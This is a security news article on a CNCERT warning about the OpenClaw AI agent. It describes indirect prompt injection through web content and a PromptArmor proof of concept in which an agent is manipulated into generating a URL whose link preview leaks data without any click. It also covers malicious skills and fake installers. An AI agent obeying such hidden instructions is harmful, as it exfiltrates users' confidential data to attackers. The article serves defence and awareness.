CNCERT Warns OpenClaw Flaws Enable Prompt Injection and Data Theft

China’s National Computer Network Emergency Response Technical Team (CNCERT) warned that OpenClaw, an open-source self-hosted AI agent, ships with what it called “inherently weak default security configurations” and that its privileged access to systems could let attackers seize control of endpoints.

The core risk centers on prompt injection attacks. CNCERT described scenarios where malicious instructions hidden in web content trick an agent into revealing sensitive data. Security researchers call these indirect prompt injection attacks, or cross-domain prompt injection, because attackers abuse benign AI features like web summarization or content analysis rather than directly prompting a large language model.

OpenAI has also noted the growing risk. “AI agents are increasingly able to browse the web, retrieve information, and take actions on a user’s behalf,” OpenAI said. “Those capabilities are useful, but they also create new ways for attackers to try to manipulate the system.”

Concrete proof of concept attacks have emerged. Researchers at PromptArmor found that link preview features in messaging apps such as Telegram and Discord can be turned into an automatic data exfiltration channel when interacting with OpenClaw. PromptArmor explained that an agent can be manipulated to generate a URL that, when rendered as a preview, transmits confidential data to an attacker-controlled domain without any human clicking the link.

“This means that in agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link,” PromptArmor said. Their finding shows how standard convenience features can create high-risk paths for leaking secrets.

CNCERT listed additional concerns beyond prompt injection: the agent might misinterpret instructions and accidentally delete critical data; threat actors could upload malicious skills to community repositories like ClawHub that run arbitrary commands; and known security vulnerabilities in OpenClaw could be used to compromise systems and leak information.

CNCERT cautioned that for sectors such as finance and energy those failures could be severe. “For critical sectors such as finance and energy such breaches could lead to the leakage of core business data, trade secrets, and code repositories, or even result in the complete paralysis of entire business systems, causing incalculable losses,” the agency said.

To mitigate risk, CNCERT advised organizations to strengthen network controls, avoid exposing OpenClaw’s default management port to the internet, run the agent in an isolated container, never store credentials in plaintext, only install skills from trusted channels, disable automatic skill updates, and keep the agent patched.

Threat actors have already capitalized on OpenClaw’s popularity. Security firm Huntress reported malicious GitHub repositories posing as OpenClaw installers that distributed information stealers and proxy malware. Huntress said the campaign broadly targeted users trying to install OpenClaw and succeeded in part because the malicious repositories were hosted on GitHub and surfaced highly in AI-driven search suggestions.

Bloomberg reported that Chinese authorities have moved to restrict state-run enterprises and government agencies from running OpenClaw apps on office machines as a precaution, and that the ban reportedly extends to families of military personnel.

OpenClaw users and administrators should treat agent deployments like any other networked service: assume internet-exposed features can be weaponized, limit privileges, and follow CNCERT and vendor guidance to reduce attack surface and the risk of data loss.

For practical guidance on preventing and mitigating prompt injection in agentic systems, see mitigating prompt injection attacks.

#OpenClaw #PromptInjection #AIsecurity #CNCERT #DataExfiltration